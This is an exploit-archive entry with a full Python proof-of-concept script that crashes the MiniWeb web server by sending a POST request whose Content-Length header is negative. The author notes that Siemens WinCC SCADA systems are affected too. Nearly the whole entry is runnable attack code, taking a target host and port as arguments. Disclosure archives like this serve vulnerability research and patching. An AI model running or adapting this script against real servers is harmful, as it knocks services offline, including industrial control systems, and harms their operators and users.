MiniWeb Content-Length Denial Of Service

2012-06-01T00:00:00
ID 1337DAY-ID-18411
Type zdt
Reporter infodox
Modified 2012-06-01T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            #!/usr/bin/env python
# miniweb Content-Length DoS PoC
# Not a 0day, sadly.
# aluigi found this ages back, I independantly rediscovered it fuzzing
# and noticed it was still unpatched. Oh well, better disclose so!
# vuln version at code.google.com/p/miniweb/
# affects WinCC also :) (Oh, them SCADA...)
# Massive props to ohdae for helping with this!
# insecurety.net | bindshell.it.cx
import sys
import socket

def banner():
    print """
MiniWeb Killer - Kills MiniWeb
-Insecurety Research
-Bindshell Labs
"""

if len(sys.argv) != 3:
    banner()
    print "Usage: ./MiniDoS.py <host> <port>"
    sys.exit(1)

banner()
target = sys.argv[1]
port = sys.argv[2]

evil = "POST / HTTP/1.1\r\n"
evil += "Host: %s\r\n" %(target)
evil += "User-Agent: MiniWeb Killer ^-^\r\n"
evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
    expl.connect((target, int(port)))
    print "[+] Connected, firing das payload!"
except:
    print "[-] Connection Failed... Is there even a target?"
    sys.exit(1)
try:
    expl.send(evil)
    print "[+] Payload Sent!"
except:
    print "[-] Payload Sending Failure... WTF?"
    sys.exit(1)
expl.close()
print "[*] Should be dead..."



#  0day.today [2018-03-19]  #